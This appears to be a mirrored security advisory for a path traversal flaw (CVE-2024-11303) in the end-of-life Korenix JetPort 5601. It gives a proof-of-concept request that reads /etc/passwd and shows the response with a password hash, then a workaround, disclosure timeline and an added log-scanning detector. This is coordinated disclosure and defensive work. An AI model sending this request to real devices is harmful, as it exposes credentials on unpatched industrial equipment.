Korenix JetPort 5601 1.2 Path Traversal

Published: 22 Nov 2024 00:00:00 | Reported by: Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

Korenix JetPort 5601 1.2 Path Traversal CVE-2024-1130

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Korenix JetPort 5601 1.2 Path Traversal Vulnerability | 24 Nov 2024 00:00 | zdt |
| Circl | CVE-2024-11303 | 18 Nov 2024 13:36 | circl |
| CNNVD | Korenix JetPort 5601 Path Traversal Vulnerability | 18 Nov 2024 00:00 | cnnvd |
| CVE | CVE-2024-11303 | 18 Nov 2024 13:24 | cve |
| Cvelist | CVE-2024-11303 Path Traversal | 18 Nov 2024 13:24 | cvelist |
| EUVD | EUVD-2024-33715 | 3 Oct 2025 20:07 | euvd |
| Nuclei | Korenix JetPort 5601v3 - Path Traversal | 24 Jun 2026 03:02 | nuclei |
| NVD | CVE-2024-11303 | 18 Nov 2024 14:15 | nvd |
| OpenVAS | Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 2017 00:00 | openvas |
| Positive Technologies | PT-2024-16895 · Korenix · Korenix Jetport 5601 | 18 Nov 2024 00:00 | ptsecurity |

`St. Pölten UAS 20241118-1  
-------------------------------------------------------------------------------  
title| Path Traversal  
product| Korenix JetPort 5601  
vulnerable version| 1.2  
fixed version| -  
CVE number| CVE-2024-11303  
impact| High  
homepage| https://www.korenix.com/  
found| 2024-05-24  
by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer,  
| C. Hierzer, M. Pammer  
| These vulnerabilities were discovered during research at  
| St.Pölten UAS, supported and coordinated by CyberDanube.  
|  
| https://fhstp.ac.at | https://cyberdanube.com  
-------------------------------------------------------------------------------  
  
Vendor description  
-------------------------------------------------------------------------------  
"Korenix Technology, a Beijer group company within the Industrial Communication  
business area, is a global leading manufacturer providing innovative, market-  
oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
With decades of experiences in the industry, we have developed various product  
lines [...].  
  
Our products are mainly applied in SMART industries: Surveillance, Machine-to-  
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer  
base covers different Sales channels, including end-customers, OEMs, system  
integrators, and brand label partners. [...]"  
  
Source: https://www.korenix.com/en/about/index.aspx?kind=3  
  
  
Vulnerable versions  
-------------------------------------------------------------------------------  
Korenix JetPort 5601v3 / v1.2  
  
  
Vulnerability overview  
-------------------------------------------------------------------------------  
1) Path Traversal (CVE-2024-11303)  
Unauthenticated users can perform a path traversal attack. This gives access  
to the operating system of the device and to information such as configuration  
files, connections to other hosts, or potentially other sensitive information.  
  
  
Proof of Concept  
-------------------------------------------------------------------------------  
1) Path Traversal (CVE-2024-11303)  
The path traversal vulnerability can be triggered by sending the following  
request:  
-------------------------------------------------------------------------------  
GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1  
Host: 10.69.10.2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Te: trailers  
Connection: keep-alive  
-------------------------------------------------------------------------------  
Note that this is only possible when an interceptor proxy or a command line  
tool is used. A web browser would encode the characters and the path traversal  
would not work.  
The response to this request is shown below:  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Server: thttpd/2.19-MX Jun 2 2022  
Content-type: text/plain; charset=iso-8859-1  
[...]  
Accept-Ranges: bytes  
Connection: Keep-Alive  
Content-length: 86  
  
root::0:0:root:/root:/bin/false  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true  
-------------------------------------------------------------------------------  
  
The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).  
  
  
Solution  
-------------------------------------------------------------------------------  
None. Device is End-of-Life.  
  
  
Workaround  
-------------------------------------------------------------------------------  
Limit the access to the device and place it within a segmented network.  
  
  
Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends that Korenix customers upgrade to another device.  
  
  
Contact Timeline  
-------------------------------------------------------------------------------  
2024-09-23: Contacting Beijer Electronics Group via [email protected].  
2024-09-24: Vendor stated that the device is end-of-life. Contact will ask the  
engineering team if there are any changes.  
2024-10-15: Vendor stated that the advisory can be published. No further  
updates are planned for this device.  
2024-11-18: Coordinated disclosure of advisory.  
  
  
Web: https://www.fhstp.ac.at/  
Twitter: https://x.com/fh_stpoelten  
Mail: [email protected]  
  
EOF T. Weber / @2024  
  
  
`
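
To support the workaround above, the following added example (not part of the advisory or any vendor code) scans access-log lines for request targets whose percent-decoded path climbs above the web root, which is the pattern in the advisory's request. It generalizes to double encoding and backslash separators; the Common Log Format input, the sample lines, and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so double encoding (%252e) is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_web_root(target):
    """True if the decoded path climbs above '/' at any point."""
    path = fully_decode(target.split("?", 1)[0]).replace("\\", "/")
    depth = 0
    for segment in path.split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def find_traversal_attempts(log_lines):
    """Return (line_number, target) for each request that escapes the root."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match and escapes_web_root(match.group("target")):
            hits.append((number, match.group("target")))
    return hits

# Constructed sample log lines (not captured from a real device).
SAMPLE_LOG = [
    '10.69.10.50 - - [18/Nov/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.69.10.50 - - [18/Nov/2024:10:00:02 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 86',
    '10.69.10.50 - - [18/Nov/2024:10:00:03 +0000] "GET /img/../style.css HTTP/1.1" 200 900',
    '10.69.10.50 - - [18/Nov/2024:10:00:04 +0000] "GET /%252E%252E/etc/passwd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print(find_traversal_attempts(SAMPLE_LOG))
```

Tracking directory depth rather than matching the string `..` keeps in-root paths such as `/img/../style.css` from being flagged.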


Vulners AI Score: 7.1 (High risk)
CVSS 4: 8.7
EPSS: 0.0181